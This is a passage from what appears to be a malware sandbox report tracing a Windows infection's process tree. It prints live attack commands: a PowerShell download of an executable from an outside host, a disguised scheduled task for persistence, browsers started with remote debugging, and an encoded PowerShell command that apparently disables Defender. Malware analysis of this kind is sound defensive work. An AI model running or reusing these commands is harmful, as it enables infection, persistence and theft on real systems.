      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:4732
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3572
      - C:\Users\Admin\AppData\Local\Temp\10003000101\a500e4f1ae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10003000101\a500e4f1ae.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\10003000101\a500e4f1ae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10003000101\a500e4f1ae.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4336
      - C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5368
      - C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe"
        8⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2396
      - C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:844
      - C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
        
        C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2684
        
        C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:5800
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3076
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        10⤵
        
        PID:1140
      - C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1964
      - C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        8⤵
        Executes dropped EXE
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6524
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
        9⤵
        Executes dropped EXE
        
        PID:6860
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6728
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6524 -s 804
        9⤵
        Program crash
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6632
        
        C:\Windows\SysWOW64\SCHTASKS.exe
        
        SCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST
        9⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:6800
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        
        PID:3160
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5580
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:6180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd4,0x108,0x7ffdc8a6dcf8,0x7ffdc8a6dd04,0x7ffdc8a6dd10
        11⤵
        
        PID:5620
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2100 /prefetch:3
        11⤵
        
        PID:6640
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2072,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2068 /prefetch:2
        11⤵
        
        PID:6800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2364,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2376 /prefetch:8
        11⤵
        
        PID:1184
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3248 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:7092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3308 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:2084
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4324 /prefetch:2
        11⤵
        Uses browser remote debugging
        
        PID:2940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4700 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:6500
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5152,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5164 /prefetch:8
        11⤵
        
        PID:6248
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5512,i,12541144708327265571,9897931091896338368,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5524 /prefetch:8
        11⤵
        
        PID:4680
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:7128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffdb754f208,0x7ffdb754f214,0x7ffdb754f220
        11⤵
        
        PID:6132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1952,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=2560 /prefetch:3
        11⤵
        
        PID:7060
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2524,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:2
        11⤵
        
        PID:4128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1768,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=2568 /prefetch:8
        11⤵
        
        PID:6788
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3548,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:4836
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3552,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:7148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=4172,i,8071279114296885710,2794585104129770694,262144 --variations-seed-version --mojo-platform-channel-handle=4780 /prefetch:2
        11⤵
        
        PID:2400
        
        C:\ProgramData\rqi589zcba.exe
        
        "C:\ProgramData\rqi589zcba.exe"
        10⤵
        
        PID:5936
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:2060
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:6452
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:5304
        
        C:\ProgramData\gdtrimy5xl.exe
        
        "C:\ProgramData\gdtrimy5xl.exe"
        10⤵
        
        PID:4352
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:4404
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:1976
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:912
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:3904
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:6920
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1292
        12⤵
        Program crash
        
        PID:16620
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1340
        12⤵
        Program crash
        
        PID:16772
        
        C:\ProgramData\2nop8qimgv.exe
        
        "C:\ProgramData\2nop8qimgv.exe"
        10⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\rOWktlhh\fpHHCwN8RAi9TDj5.exe
        
        C:\Users\Admin\AppData\Local\Temp\rOWktlhh\fpHHCwN8RAi9TDj5.exe 0
        11⤵
        
        PID:5184
        
        C:\Users\Admin\AppData\Local\Temp\rOWktlhh\a3DpRp3jBTeNsqQJ.exe
        
        C:\Users\Admin\AppData\Local\Temp\rOWktlhh\a3DpRp3jBTeNsqQJ.exe 5184
        12⤵
        
        PID:6692
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6692 -s 676
        13⤵
        Program crash
        
        PID:16496
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5184 -s 920
        12⤵
        Program crash
        
        PID:16488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\eua1n" & exit
        10⤵
        
        PID:16688
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        11⤵
        Delays execution with timeout.exe
        
        PID:17328
        
        C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"
        8⤵
        
        PID:3708
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5364
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:3108
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
        8⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
        9⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
        9⤵
        
        PID:6036
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
        9⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
        9⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
        9⤵
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\10028880101\d87c2502d6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028880101\d87c2502d6.exe"
        8⤵
        
        PID:4196
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        9⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\10028890101\a5175ec3d5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028890101\a5175ec3d5.exe"
        8⤵
        
        PID:2480
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        9⤵
        
        PID:2072
      - C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3616
      - C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3160
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        7⤵
        Executes dropped EXE
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2624
      - C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1748
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2752
        
        C:\Users\Admin\AppData\Roaming\ejrEdhQT0y.exe
        
        "C:\Users\Admin\AppData\Roaming\ejrEdhQT0y.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQ